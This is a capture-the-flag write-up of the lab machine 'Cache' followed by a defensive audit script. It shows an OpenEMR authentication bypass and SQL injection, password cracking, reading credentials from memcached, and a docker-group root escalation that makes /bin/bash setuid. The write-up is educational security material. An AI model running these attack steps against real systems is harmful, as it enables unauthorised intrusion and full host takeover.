$ nmap -p- --min-rate 5000 10.129.211.212
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-10 10:30 EDT
Nmap scan report for 10.129.211.212
Host is up (0.0089s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Accidental Subdomain Enum
Port 80 reveals a blog-like website:
There's not much here, but we can add cache.htb to our /etc/hosts file, since a banner on the page names it. I ran gobuster and wfuzz scans against the machine. Funnily enough, I had a typo in the Host header of my wfuzz command, and it turned up a completely different domain:
$ wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -H 'Host:FUZZ.htb' --hw=973 -u http://cache.htb
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://cache.htb/
Total requests: 19966
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000010187: 302 0 L 0 W 0 Ch "hms"
hms.htb is also served by this machine. After adding it to /etc/hosts, we can visit it.
OpenEMR
The page shows us a login for OpenEMR, which has a long history of published vulnerabilities:
We can head to the GitHub repository for this software and determine the installed version using the default files present:
Visiting sql_patch.php reveals that this is OpenEMR 5.0.1:
There's also an authentication bypass for the patient portal:
To bypass it, all we have to do is visit /portal/account/register.php, and the portal then treats us as logged in with a valid token. Searching for exploits led me to a PDF containing the vulnerability report for v5.0.1.3; it lists many issues, including a lot of SQL injections.
Firstly, visiting /portal/find_appt_popup_user.php just works, since we have 'bypassed' the login.
For this case, the second PoC listed works best.
Using sqlmap, we can enumerate and dump the contents of the database (enumeration output skipped).
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx (?)
1g 0:00:00:00 DONE (2023-05-10 10:53) 5.555g/s 4800p/s 4800c/s 4800C/s lester..felipe
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Now that we have the admin password, we can log in and obtain remote code execution.
Enumerating the listening ports from the shell shows that port 11211 (memcached) is listening on localhost:
ash@cache:~$ netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:11211 0.0.0.0:* LISTEN -
<TRUNCATED>
ash@cache:~$ echo "get passwd" | nc -vn -w 1 127.0.0.1 11211
Connection to 127.0.0.1 11211 port [tcp/*] succeeded!
VALUE passwd 0 9
0n3_p1ec3
END
Docker Group
luffy is part of the docker group.
luffy@cache:/home/ash$ id
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)
luffy@cache:/home/ash$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
ubuntu latest 2ca708c1c9cc 3 years ago 64.2MB
Membership in the docker group lets us run an Ubuntu container with the host's root filesystem bind-mounted, and we are root inside that container. This effectively gives us root access to the host filesystem, which we use to make /bin/bash a SUID binary.
luffy@cache:/home/ash$ docker run -it --rm -v /:/mnt ubuntu chroot /mnt bash
root@ee809b31a278:/# id
uid=0(root) gid=0(root) groups=0(root)
root@ee809b31a278:/# cd root
root@ee809b31a278:~# ls
root.txt run.sh should_work
root@ee809b31a278:~# chmod u+s /bin/bash
Then we can exit the container and spawn the SUID bash to get a shell with an EUID of root.
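As a defender's follow-up to the memcached and docker group findings above, here is an added POSIX shell audit (my own example, not from the writeup) that reports docker group members, what is listening on port 11211 and whether it is loopback-only, and any setuid shells left in the system directories. The function names and the netstat -tulpn column layout it parses are assumptions.

```shell
#!/bin/sh
# Post-incident audit for the host-side weaknesses this box fell to.
# Added example; function names and the netstat -tulpn layout are assumed.

# Members of the docker group, space-separated. Docker group membership is
# equivalent to root because a member can bind-mount / into a container.
# Usage: docker_group_members /etc/group
docker_group_members() {
    awk -F: '$1 == "docker" && $4 != "" { gsub(",", " ", $4); print $4 }' "$1"
}

# Listeners on a given port, read from `netstat -tulpn` output on stdin.
# Prints "proto local_address scope", scope being loopback-only or exposed.
# A loopback-only memcached is still readable by every local user, since the
# protocol has no authentication, so it must not hold credentials.
# Usage: netstat -tulpn 2>/dev/null | listeners_on_port 11211
listeners_on_port() {
    awk -v port="$1" '
        $1 ~ /^(tcp|udp)/ {
            n = split($4, a, ":")
            if (a[n] != port) next
            host = substr($4, 1, length($4) - length(a[n]) - 1)
            scope = (host == "127.0.0.1" || host == "::1") ? "loopback-only" : "exposed"
            print $1, $4, scope
        }'
}

# Setuid shells in the given directories (-H follows a /bin -> /usr/bin symlink).
# A setuid /bin/bash is exactly the persistence artifact left at the end of this box.
# Usage: setuid_shells /bin /usr/bin
setuid_shells() {
    find -H "$@" -maxdepth 1 -type f -perm -4000 \
        \( -name bash -o -name sh -o -name dash -o -name zsh \) 2>/dev/null | sort
}

run_audit() {
    echo "docker group members: $(docker_group_members /etc/group)"
    echo "port 11211 listeners:"
    netstat -tulpn 2>/dev/null | listeners_on_port 11211
    echo "setuid shells:"
    setuid_shells /bin /usr/bin
}

# Run the live audit only when invoked with --run, so sourcing the file has no side effects.
if [ "${1-}" = "--run" ]; then
    run_audit
fi
```

Run it as `sh audit.sh --run` on the host; each function can also be pointed at a copied /etc/group or saved netstat output during offline forensics.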